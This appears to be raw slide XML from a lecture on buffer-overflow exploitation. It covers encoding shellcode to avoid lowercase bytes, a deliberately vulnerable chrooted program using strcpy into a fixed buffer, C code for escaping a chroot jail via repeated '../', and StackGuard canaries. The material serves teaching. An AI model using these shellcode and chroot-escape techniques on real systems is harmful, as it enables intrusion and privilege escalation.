              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26627" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="838200"/>
            <a:ext cx="7772400" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Solution for exploit3.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>In exploit3.c modify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>the shell code so that it doesn’t contain small letters.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>E.g. \x2f\x62\x69\x6e\x2f\x73\x68 (/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>) is converted to \x2f\x12\x19\x1e\x2f\x23\x18</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Change the characters back when the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t> is executed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Add \0x50 back to obtain \x62, \x69, \x6e, \x73, and \x68</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>Solution </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>for exploit4.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>No modification is needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The shellcode is in somewhere else and is not passed as an argument</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW"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8CB31094-B405-4B68-B9DF-CE927B45E253}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29699" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="609600"/>
            <a:ext cx="7772400" cy="6248400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Break </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chroot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>If the vulnerable program is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>chrooted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, we can access only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>chrooted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t> directory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>For example, in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>FTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>server, "/" is the home directory of the user and there may be no "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>" inside the "fake" root.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>chroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t> changes the apparent root directory for the current running process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>chdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t> changes the working directory for the current running process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="4038600"/>
            <a:ext cx="5502275" cy="255454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600" dirty="0"/>
              <a:t>#include&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>#include&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>unistd.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>argc,char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t> **</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0"/>
              <a:t>) {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>        char buffer[1024];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>chroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>("/home/ftp");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>chdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>("/");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>        if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>&gt;1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>buffer,argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="16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43CF72F0-F4D8-4716-880B-5633117F28B5}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30723" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="533400"/>
            <a:ext cx="7772400" cy="6096000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Solution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Chroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t> back to the "real" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>at the beginning of the shell code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Make a new directory "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>" for referencing, then use many "../" to get a real root directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>The following shows the correspond C code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Compile and disassemble the above program and then get the inside to the beginning of the shell code.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30724" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2362200" y="3048000"/>
            <a:ext cx="5654675" cy="18034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600" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0"/>
              <a:t> main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>("sh",0755);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>chroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>        /* many "../" */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>chroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>("../../../../../../../../../../../../../../../../");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="16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85800" y="457200"/>
            <a:ext cx="7772400" cy="6172200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>StackGuard</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Place a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>canary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> word below the return address on stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>“below” means having a lower memory address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>When the function returns, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>StackGuard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> first checks to see that the canary word is intact</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>If the canary word is modified, terminate the program immediately</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3789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3949DD8F-E8EB-4661-823F-996C6D29EA38}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37892" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="3962400"/>
            <a:ext cx="9733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600" dirty="0"/>
              <a:t>Lower</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>Memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37893" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="6027003"/>
            <a:ext cx="9733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600" dirty="0"/>
              <a:t>Higher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>Memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
